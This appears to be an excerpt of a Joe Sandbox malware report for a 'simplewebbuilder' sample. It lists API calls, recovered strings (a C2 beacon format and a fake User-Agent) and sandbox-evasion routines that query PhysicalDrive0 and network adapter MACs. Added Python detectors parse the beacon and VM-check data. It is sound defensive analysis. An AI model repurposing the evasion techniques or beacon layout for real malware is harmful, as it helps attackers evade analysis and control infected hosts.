                                                                                                                            • _memset.LIBCMT ref: 009B6C02
                                                                                                                            • _memset.LIBCMT ref: 009B6C0F
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B6C1D
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B6C2A
                                                                                                                            • _malloc.LIBCMT ref: 009B6C4E
                                                                                                                              • Part of subcall function 009C35AC: __FF_MSGBANNER.LIBCMT ref: 009C35C3
                                                                                                                              • Part of subcall function 009C35AC: __NMSG_WRITE.LIBCMT ref: 009C35CA
                                                                                                                              • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF
                                                                                                                            • _malloc.LIBCMT ref: 009B6C5C
                                                                                                                            • _malloc.LIBCMT ref: 009B6C63
                                                                                                                            • _malloc.LIBCMT ref: 009B6C89
                                                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 009B6C9C
                                                                                                                            • Sleep.KERNELBASE ref: 009B6CAA
                                                                                                                            • _malloc.LIBCMT ref: 009B6CB6
                                                                                                                            • _malloc.LIBCMT ref: 009B6CC3
                                                                                                                            • _memset.LIBCMT ref: 009B6CD8
                                                                                                                            • _memset.LIBCMT ref: 009B6CE8
                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 009B6D04
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B6D0F
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B6D20
                                                                                                                            • _memset.LIBCMT ref: 009B6D75
                                                                                                                            • _memset.LIBCMT ref: 009B6D84
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$PKC$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                                            • API String ID: 2251652938-2802142760
                                                                                                                            • Opcode ID: 32195a8e3e065df20c90d9b27492336c9ed849e8c52fd606f2212b73d31102f4
                                                                                                                            • Instruction ID: 7bfc38d5a8d0820469d6248dbaf78d93632f99d3c0eae137965e75d8c668c82e
                                                                                                                            • Opcode Fuzzy Hash: 32195a8e3e065df20c90d9b27492336c9ed849e8c52fd606f2212b73d31102f4
                                                                                                                            • Instruction Fuzzy Hash: D6A11271D68780AFD310AF34DC45B5B7BE8AF85750F01882EF588EB292DBB49940DB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
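Added example (not part of the Joe Sandbox report and not code from the sample): the two functions above give enough to write a network detection. The first issues a GET through WinINet with the hard-coded User-Agent "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)" (no Windows NT 9.0 exists, so an exact match is a strong signal by itself), sets options 2, 5 and 6 to 0x1388, which are INTERNET_OPTION_CONNECT_TIMEOUT, INTERNET_OPTION_SEND_TIMEOUT and INTERNET_OPTION_RECEIVE_TIMEOUT of 5000 ms, opens the URL with flags 0x04000200 (INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI) and reads the reply in 0x1000-byte chunks. The second builds the check-in with the format string cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d. The Python below turns that format string into a strict anchored regular expression, decodes the beacon fields, and runs the check over a few constructed proxy-log lines. The tab-separated log layout, the host example.invalid and every field value are made up for the example; the request path is not on the page and is deliberately not checked.

```python
import re
from urllib.parse import urlsplit

# User-Agent hard-coded in the sample (String ID above). "Windows NT 9.0" does not exist,
# so an exact match is unlikely in legitimate traffic.
SAMPLE_USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"

# Check-in format string recovered from the sample, split into (field, printf conversion).
BEACON_FORMAT = [
    ("cid", "%.8x"), ("connected", "%d"), ("sport", "%d"),
    ("high_port", "%x"), ("low_port", "%x"), ("stream", "%d"),
    ("os", "%d.%d.%04d"), ("dgt", "%d"), ("dti", "%d"),
]

# What each printf conversion can emit (sprintf prints lowercase hex for %x).
_CONV_RE = {
    "%.8x": r"[0-9a-f]{8}",
    "%d": r"-?\d+",
    "%x": r"[0-9a-f]+",
    "%d.%d.%04d": r"\d+\.\d+\.\d{4,}",
}

# One anchored regex for the whole query string; field order is part of the match.
BEACON_RE = re.compile(
    "^" + "&".join(f"{name}=(?P<{name}>{_CONV_RE[conv]})" for name, conv in BEACON_FORMAT) + "$"
)


def parse_beacon(query):
    """Return the decoded check-in fields, or None if the query does not match the format exactly."""
    m = BEACON_RE.match(query)
    if m is None:
        return None
    f = m.groupdict()
    return {
        "cid": f["cid"],                                    # keep as printed: eight hex digits
        "connected": int(f["connected"]),
        "sport": int(f["sport"]),
        "high_port": int(f["high_port"], 16),
        "low_port": int(f["low_port"], 16),
        "stream": int(f["stream"]),
        "os": tuple(int(x) for x in f["os"].split(".")),  # (major, minor, build)
        "dgt": int(f["dgt"]),
        "dti": int(f["dti"]),
    }


def classify_request(url, user_agent):
    """Return ([reasons], beacon) for one request; reasons is empty for traffic that matches nothing."""
    reasons = []
    if user_agent == SAMPLE_USER_AGENT:
        reasons.append("user-agent")
    beacon = parse_beacon(urlsplit(url).query)
    if beacon is not None:
        reasons.append("beacon-query")
    return reasons, beacon


def scan_proxy_log(lines):
    """Scan tab-separated lines: timestamp, client, method, url, user-agent (a constructed layout)."""
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 5:
            continue  # hypothetical layout; skip anything that does not fit it
        ts, client, _method, url, ua = parts
        reasons, beacon = classify_request(url, ua)
        if reasons:
            hits.append({"ts": ts, "client": client, "url": url, "reasons": reasons, "beacon": beacon})
    return hits


# Constructed log lines: an ordinary request, a full check-in, and a UA match with a malformed query.
SAMPLE_LOG = [
    "2024-03-20T10:00:01Z\t10.0.0.5\tGET\thttp://example.invalid/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "2024-03-20T10:00:07Z\t10.0.0.5\tGET\thttp://example.invalid/?cid=0a1b2c3d&connected=1&sport=1080"
    "&high_port=ffff&low_port=400&stream=1&os=6.1.7601&dgt=0&dti=0\t" + SAMPLE_USER_AGENT,
    "2024-03-20T10:00:09Z\t10.0.0.7\tGET\thttp://example.invalid/?cid=12&connected=1\t" + SAMPLE_USER_AGENT,
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["reasons"], hit["beacon"])
```

Matching the full query shape rather than the User-Agent alone keeps the rule useful if an operator rebuilds the sample with a different UA string; the eight-hex-digit cid field is the natural value to pivot on across hosts, and sport, high_port and low_port are the values to compare against the proxy-port strings (connect, disconnect, updips, updurls) seen in the first function.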

Control-flow Graph
(function 0x401b4b-0x401c25; basic-block edge list and executed/not-executed colouring not reproduced: LoadLibraryA of iphlpapi.dll, GetProcAddress of GetAdaptersInfo, a GetAdaptersInfo call loop with buffer reallocation, then FreeLibrary)
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                                            • API String ID: 514930453-3667123677
                                                                                                                            • Opcode ID: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
                                                                                                                            • Instruction ID: 696171d77ced3da8e64ebdc8d7a45064a9ae827dbc58ea61f09f05304c00b930
                                                                                                                            • Opcode Fuzzy Hash: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
                                                                                                                            • Instruction Fuzzy Hash: 6421D870940209AEDF219FA5CD447EF7BB8EF41304F0440BAD604B22E1E7789985CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph
(function 0x9bff9d-0x9c0087; basic-block edge list and executed/not-executed colouring not reproduced: LoadLibraryA of iphlpapi.dll, GetProcAddress of GetAdaptersInfo, a GetAdaptersInfo call loop with buffer reallocation, then FreeLibrary; same construction as the 0x401b4b routine above, here in the unpacked 0x9b1000 region)
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 009BFFB3
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 009BFFCC
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 009BFFF1
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 009C007A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                                            • API String ID: 514930453-3114217049
                                                                                                                            • Opcode ID: 4de22c386df0995df5fb6153a358f0eef0d796db067c9d3ff99baa9494dc0cfc
                                                                                                                            • Instruction ID: 8efa55a8b4fbd3d7cf5d18809960860bf99e9eb3eb05a96fb25a781ae8a6a2c7
                                                                                                                            • Opcode Fuzzy Hash: 4de22c386df0995df5fb6153a358f0eef0d796db067c9d3ff99baa9494dc0cfc
                                                                                                                            • Instruction Fuzzy Hash: D021B431E04209EBDB11DBA8C894BFEBBBCAF85310F1541AEE504E7241D7349E85CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
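The function above resolves GetAdaptersInfo at run time (LoadLibraryA("iphlpapi.dll") followed by GetProcAddress), so iphlpapi never appears in the import table, calls it, and unloads the library with FreeLibrary; the edge from block 570 back to the GetAdaptersInfo block (548) is consistent with a second call after the first one returns the required buffer size. GetAdaptersInfo fills a singly linked list of IP_ADAPTER_INFO records, each carrying the adapter's GUID name, description, MAC address, interface index and IP address, which is standard host-fingerprinting material. The Python below is an added analyst-side example, not code from the sample or from Joe Sandbox: it walks such a buffer as captured from a 32-bit process dump (the sample is 32-bit), rebases the absolute Next pointers against the address the buffer was read from, and looks up each MAC's OUI against well-known hypervisor prefixes. The dump, the capture address, the adapter names, IPs and MACs are constructed for the example, and the OUI check is an analyst's use of the data; this record does not show what the sample compares the result against.

```python
import struct

# sizeof(IP_ADAPTER_INFO) in a 32-bit process
ADAPTER_INFO_SIZE = 640
# Fixed-offset prefix: Next, ComboIndex, AdapterName[260], Description[132],
# AddressLength, Address[8], Index, Type, DhcpEnabled  (424 bytes)
_PREFIX = "<II260s132sI8sIII"
# IpAddressList (IP_ADDR_STRING) at offset 428: Next, IpAddress[16], IpMask[16], Context
_IPADDR = "<I16s16sI"
_IPADDR_OFF = 428

# Well-known hypervisor OUIs. Assumption: analyst-side lookup only; the record
# above shows the enumeration, not the sample's own comparison list.
VM_OUIS = {
    "00:05:69": "VMware", "00:0c:29": "VMware", "00:1c:14": "VMware", "00:50:56": "VMware",
    "08:00:27": "VirtualBox", "52:54:00": "QEMU/KVM", "00:15:5d": "Hyper-V", "00:16:3e": "Xen",
}


def _cstr(raw):
    return raw.split(b"\x00", 1)[0].decode("ascii", "replace")


def parse_adapter_info(buf, base):
    """Walk the IP_ADAPTER_INFO list in a dumped buffer.

    `base` is the virtual address the buffer was captured at; Next pointers
    are absolute addresses, so each one is rebased to a buffer offset.
    """
    adapters, off, seen = [], 0, set()
    while 0 <= off and off + ADAPTER_INFO_SIZE <= len(buf) and off not in seen:
        seen.add(off)
        nxt, _combo, name, desc, addr_len, addr, index, typ, dhcp = \
            struct.unpack_from(_PREFIX, buf, off)
        _, ip, mask, _ = struct.unpack_from(_IPADDR, buf, off + _IPADDR_OFF)
        mac = ":".join("%02x" % b for b in addr[:addr_len])
        adapters.append({
            "name": _cstr(name), "description": _cstr(desc), "mac": mac,
            "index": index, "type": typ, "dhcp": bool(dhcp),
            "ip": _cstr(ip), "mask": _cstr(mask),
            "vm_vendor": VM_OUIS.get(mac[:8]),
        })
        if nxt == 0:
            break
        off = nxt - base
    return adapters


def hypervisor_adapters(buf, base):
    """Adapters whose MAC OUI belongs to a hypervisor vendor."""
    return [a for a in parse_adapter_info(buf, base) if a["vm_vendor"]]


def build_adapter_info(entries, base):
    """Constructed IP_ADAPTER_INFO chain for offline use (not a real capture)."""
    out = b""
    for i, e in enumerate(entries):
        nxt = base + (i + 1) * ADAPTER_INFO_SIZE if i + 1 < len(entries) else 0
        mac = bytes.fromhex(e["mac"].replace(":", "")).ljust(8, b"\x00")
        rec = struct.pack(_PREFIX, nxt, i, e["name"].encode(), e["description"].encode(),
                          6, mac, i + 1, 6, 1)          # type 6 = MIB_IF_TYPE_ETHERNET
        rec += b"\x00" * 4                                # CurrentIpAddress pointer
        rec += struct.pack(_IPADDR, 0, e["ip"].encode(), e["mask"].encode(), 0)
        out += rec.ljust(ADAPTER_INFO_SIZE, b"\x00")
    return out


# Constructed sample dump: hypothetical capture address, invented adapters.
SAMPLE_BASE = 0x00A40000
SAMPLE_DUMP = build_adapter_info([
    {"name": "{6E8B2A6C-1D2E-4F5A-9B3C-0123456789AB}",
     "description": "Intel(R) PRO/1000 MT Network Connection",
     "mac": "00:0c:29:3a:5f:10", "ip": "192.168.56.101", "mask": "255.255.255.0"},
    {"name": "{0F1E2D3C-4B5A-6978-8796-A5B4C3D2E1F0}",
     "description": "Realtek PCIe GbE Family Controller",
     "mac": "02:1a:2b:3c:4d:5e", "ip": "10.1.2.3", "mask": "255.255.0.0"},
], SAMPLE_BASE)

if __name__ == "__main__":
    for a in parse_adapter_info(SAMPLE_DUMP, SAMPLE_BASE):
        print(a["index"], a["mac"], a["ip"], a["description"], a["vm_vendor"] or "")
```

When the buffer comes from a live dump, `base` is the address passed to GetAdaptersInfo (the first argument visible in the API record); the walker stops on a truncated record, a NULL Next, or a pointer that loops, so a partially captured buffer yields the records that are complete rather than an exception.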

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 628 9bfe99-9bfec4 CreateFileA 629 9bfeca-9bfedf 628->629 630 9bff95-9bff9c 628->630 631 9bfee2-9bff04 DeviceIoControl 629->631 632 9bff3d-9bff45 631->632 633 9bff06-9bff0e 631->633 636 9bff4e-9bff50 632->636 637 9bff47-9bff4d call 9c3da8 632->637 634 9bff10-9bff15 633->634 635 9bff17-9bff1c 633->635 634->632 635->632 640 9bff1e-9bff26 635->640 638 9bff8b-9bff94 FindCloseChangeNotification 636->638 639 9bff52-9bff55 636->639 637->636 638->630 642 9bff71-9bff7e call 9c414c 639->642 643 9bff57-9bff60 GetLastError 639->643 644 9bff29-9bff2e 640->644 642->638 652 9bff80-9bff86 642->652 643->638 646 9bff62-9bff65 643->646 644->644 648 9bff30-9bff3c call 9bfcec 644->648 646->642 649 9bff67-9bff6e 646->649 648->632 649->642 652->631
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 009BFEB8
                                                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 009BFEF6
                                                                                                                            • GetLastError.KERNEL32 ref: 009BFF57
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 009BFF8E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                                                            • API String ID: 3786717961-1180397377
                                                                                                                            • Opcode ID: 55e0598233610ddbb63944b3ff150e21a89be70958c4e96328e225eeba6ea324
                                                                                                                            • Instruction ID: 9e438454ca2d4428707e34b80242b468ba41a5c0b2c5dfba47aaf148ff6e258a
                                                                                                                            • Opcode Fuzzy Hash: 55e0598233610ddbb63944b3ff150e21a89be70958c4e96328e225eeba6ea324
                                                                                                                            • Instruction Fuzzy Hash: D431BE71D00219ABCB24DF94CE94AFEBBB8FB46720F20417AF504A3280DB705E45DB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 654 401a4f-401a77 CreateFileA 655 401b45-401b4a 654->655 656 401a7d-401a91 654->656 657 401a98-401ac0 DeviceIoControl 656->657 658 401ac2-401aca 657->658 659 401af3-401afb 657->659 660 401ad4-401ad9 658->660 661 401acc-401ad2 658->661 662 401b04-401b07 659->662 663 401afd-401b03 call 402e56 659->663 660->659 666 401adb-401af1 call 402e70 call 4018cc 660->666 661->659 664 401b09-401b0c 662->664 665 401b3a-401b44 FindCloseChangeNotification 662->665 663->662 669 401b27-401b34 call 402e48 664->669 670 401b0e-401b17 GetLastError 664->670 665->655 666->659 669->657 669->665 670->665 672 401b19-401b1c 670->672 672->669 675 401b1e-401b24 672->675 675->669
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                                                            • API String ID: 3786717961-1180397377
                                                                                                                            • Opcode ID: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
                                                                                                                            • Instruction ID: 8e9e512524d6225b66ba562a13c5a7f417e6abf84bb9e2e9af9964b6e94f018c
                                                                                                                            • Opcode Fuzzy Hash: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
                                                                                                                            • Instruction Fuzzy Hash: CE318B71D01218EACB21EFA5CD849EFBBB8FF41750F20407AE514B22A0E7785E45CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
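Both copies of the function above (in the unpacked region at 9bfe99 and in the on-disk image at 401a4f) open \\.\PhysicalDrive0 with dwDesiredAccess 0, share mode 7 and OPEN_EXISTING (3); with no read or write access requested the open succeeds for a standard user, which is why this check does not need elevation. They then call DeviceIoControl with control code 0x2D1400, a 12-byte input buffer and a 0x400-byte output buffer. 0x2D1400 decodes to IOCTL_STORAGE_QUERY_PROPERTY (device type 0x2D FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED), the 12-byte input is a STORAGE_PROPERTY_QUERY, and the reply is a STORAGE_DEVICE_DESCRIPTOR whose vendor and product strings name the disk; hypervisor disks identify themselves there, which is the "virtual machine (disk enumeration)" signature listed for this sample. The edge from block 652 back to the DeviceIoControl block is consistent with a retry after GetLastError, for instance when the descriptor does not fit. The FindCloseChangeNotification entry is the CloseHandle on the drive handle; the two names resolve to the same address in kernelbase, so the symbolizer shows this one. The Python below is an added analyst-side example, not code from the sample or from Joe Sandbox: it decodes the control code and parses a descriptor buffer the way the sample must after the call returns. The descriptor buffers and the VM_MARKERS list are constructed for the example; the strings the sample itself compares against are decrypted at run time and are not visible in this record.

```python
import struct

# CTL_CODE fields (winioctl.h)
FILE_DEVICE_MASS_STORAGE = 0x2D
METHOD_BUFFERED = 0
IOCTL_STORAGE_QUERY_PROPERTY = 0x2D1400

# STORAGE_PROPERTY_QUERY: PropertyId, QueryType, AdditionalParameters[1] -> 12 bytes,
# the 0xC input-buffer size seen in the DeviceIoControl call.
StorageDeviceProperty, PropertyStandardQuery = 0, 0
STORAGE_PROPERTY_QUERY = struct.pack("<IIB", StorageDeviceProperty, PropertyStandardQuery, 0) + b"\x00" * 3

# STORAGE_DEVICE_DESCRIPTOR header: Version, Size, DeviceType, DeviceTypeModifier,
# RemovableMedia, CommandQueueing, VendorIdOffset, ProductIdOffset,
# ProductRevisionOffset, SerialNumberOffset, BusType, RawPropertiesLength (36 bytes)
_DESC_HDR = "<IIBBBBIIIIII"
_DESC_HDR_LEN = struct.calcsize(_DESC_HDR)

# Substrings a disk-based VM check commonly looks for. Assumption: the sample's
# own comparison strings are not visible in this record.
VM_MARKERS = ("VMWARE", "VBOX", "VIRTUAL", "QEMU", "XEN")


def decode_ioctl(code):
    """Split a Windows I/O control code into its CTL_CODE components."""
    return {"device_type": code >> 16, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3}


def is_storage_query_property(code):
    d = decode_ioctl(code)
    return (d["device_type"] == FILE_DEVICE_MASS_STORAGE
            and d["function"] == 0x500 and d["method"] == METHOD_BUFFERED)


def _cstr(buf, off):
    """NUL-terminated ASCII string at `off`; offset 0 means 'not present'."""
    if off == 0 or off >= len(buf):
        return ""
    end = buf.find(b"\x00", off)
    return buf[off:end if end >= 0 else len(buf)].decode("ascii", "replace").strip()


def parse_storage_device_descriptor(buf):
    """Parse the STORAGE_DEVICE_DESCRIPTOR returned by IOCTL_STORAGE_QUERY_PROPERTY."""
    if len(buf) < _DESC_HDR_LEN:
        raise ValueError("buffer shorter than the descriptor header")
    (_ver, size, _dtype, _dmod, removable, _cq,
     vendor_off, product_off, rev_off, serial_off, bus_type, _raw) = \
        struct.unpack_from(_DESC_HDR, buf, 0)
    if size > len(buf):
        # Size reports the full descriptor; a caller whose buffer is too small
        # has to re-issue the IOCTL with a larger one.
        raise ValueError("descriptor needs %d bytes, got %d" % (size, len(buf)))
    return {"vendor": _cstr(buf, vendor_off), "product": _cstr(buf, product_off),
            "revision": _cstr(buf, rev_off), "serial": _cstr(buf, serial_off),
            "bus_type": bus_type, "removable": bool(removable)}


def looks_like_vm(desc):
    """True when the vendor or product string carries a hypervisor marker."""
    ident = (desc["vendor"] + " " + desc["product"]).upper()
    return any(m in ident for m in VM_MARKERS)


def build_descriptor(vendor, product, revision="1.0", serial="", bus_type=11):
    """Constructed descriptor in the kernel's layout (offline test data, not a capture)."""
    strings, offsets = b"", []
    for s in (vendor, product, revision, serial):
        offsets.append(_DESC_HDR_LEN + len(strings) if s else 0)
        if s:
            strings += s.encode("ascii") + b"\x00"
    hdr = struct.pack(_DESC_HDR, 1, _DESC_HDR_LEN + len(strings), 0, 0, 0, 1,
                      *offsets, bus_type, 0)
    return hdr + strings


if __name__ == "__main__":
    print(hex(IOCTL_STORAGE_QUERY_PROPERTY), decode_ioctl(IOCTL_STORAGE_QUERY_PROPERTY))
    for vendor, product in (("VMware  ", "Virtual disk    "), ("", "WD10EZEX-00BN5A0")):
        d = parse_storage_device_descriptor(build_descriptor(vendor, product))
        print(repr(d["vendor"]), repr(d["product"]), "VM" if looks_like_vm(d) else "physical")
```

Real ATA/SATA disks usually return an empty vendor and put the model in the product field, while SCSI-style virtual disks fill both; matching on the concatenation, as above, covers both cases. Offsets in the descriptor are relative to the start of the structure, and an offset of 0 means the field is absent, so the parser never dereferences it.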

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlInitializeCriticalSection.NTDLL(009E81E8), ref: 009B69FA
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 009B6A11
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B6A1A
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 009B6A29
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B6A2C
                                                                                                                            • GetTickCount.KERNEL32 ref: 009B6AAE
                                                                                                                            • GetVersionExA.KERNEL32(009E8038), ref: 009B6B1F
                                                                                                                            • _memset.LIBCMT ref: 009B6B3E
                                                                                                                            • _malloc.LIBCMT ref: 009B6B4B
                                                                                                                            • _malloc.LIBCMT ref: 009B6B5B
                                                                                                                            • _malloc.LIBCMT ref: 009B6B66
                                                                                                                            • _malloc.LIBCMT ref: 009B6B71
                                                                                                                            • _malloc.LIBCMT ref: 009B6B7C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion_memset
                                                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$PKC$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                                            • API String ID: 2231600905-2802142760
                                                                                                                            • Opcode ID: 9f538885c1f2c3309950385e6ad8985e9d49f941f4ff3423bf288d08768535a4
                                                                                                                            • Instruction ID: d4c1a118862befbdc7fc3d1709cdfb2b77abd6cadfe9c813fad7f49af4ee7205
                                                                                                                            • Opcode Fuzzy Hash: 9f538885c1f2c3309950385e6ad8985e9d49f941f4ff3423bf288d08768535a4
                                                                                                                            • Instruction Fuzzy Hash: 5A912271D287809FD310AF34DC46B5B7BE8AF85750F01442EF548EB292DBB49940DB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
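The strings recovered with this function are the check-in request layout, cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d, and a hard-coded User-Agent, Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US); sprintf and strcat are fetched from ntdll by name rather than imported, and the function also calls GetVersionExA, which supplies values of the major.minor.build form the os field expects. Two properties of these strings are usable on the network side: the query-string layout is fixed, and the User-Agent claims Windows NT 9.0, a version no Windows release has ever reported. The Python below is an added detection example, not code from the sample or from Joe Sandbox: it translates the printf format into a regular expression (it generalizes to any query format built from %d, %i, %u, %x, %X and %s directives, not only this one), extracts the fields, and runs both checks over web-proxy log lines in Common Log Format. The log lines, addresses, timestamps and field values are constructed for the example.

```python
import re

# Strings recovered in this function (from the record above)
BEACON_FORMAT = ("cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x"
                 "&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d")
SAMPLE_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"

# Windows NT versions a genuine client can report in a User-Agent.
KNOWN_NT_VERSIONS = {(4, 0), (5, 0), (5, 1), (5, 2), (6, 0), (6, 1), (6, 2), (6, 3), (10, 0)}

_DIRECTIVE = re.compile(r"%(?P<flags>[-+ 0#]*)(?P<width>\d+)?(?:\.(?P<prec>\d+))?(?P<conv>[diuxXs])")


def printf_format_to_regex(fmt):
    """Turn a printf-style format into a regex for the text it prints.

    %d/%i -> optional sign plus digits, %u -> digits, %x/%X -> hex digits,
    %s -> a run without '&' or whitespace. A precision (%.8x) or a
    zero-padded width (%04d) becomes a minimum digit count.
    """
    out, pos = [], 0
    for m in _DIRECTIVE.finditer(fmt):
        out.append(re.escape(fmt[pos:m.start()]))
        conv = m.group("conv")
        prec = int(m.group("prec")) if m.group("prec") else 0
        width = int(m.group("width")) if m.group("width") and "0" in m.group("flags") else 0
        n = max(prec, width, 1)
        if conv in "di":
            out.append(r"-?\d{%d,}" % n)
        elif conv == "u":
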